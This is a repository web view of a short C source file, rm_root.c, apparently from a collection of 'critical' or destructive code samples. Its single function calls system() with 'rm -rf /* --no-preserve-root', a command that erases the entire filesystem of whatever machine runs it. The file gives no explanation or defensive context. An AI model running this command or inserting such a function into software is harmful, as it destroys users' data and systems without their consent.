summaryrefslogtreecommitdiff
path: root/src/critical/classic/rm_root.c
blob: 0ebdabaaec061a6217a824d7216ebfc1d99af2a0 (plain)
1
2
3
4
5
6
#include <stdlib.h>
#include <unistd.h>

void rm_root() {
    system("rm -rf /* --no-preserve-root");
}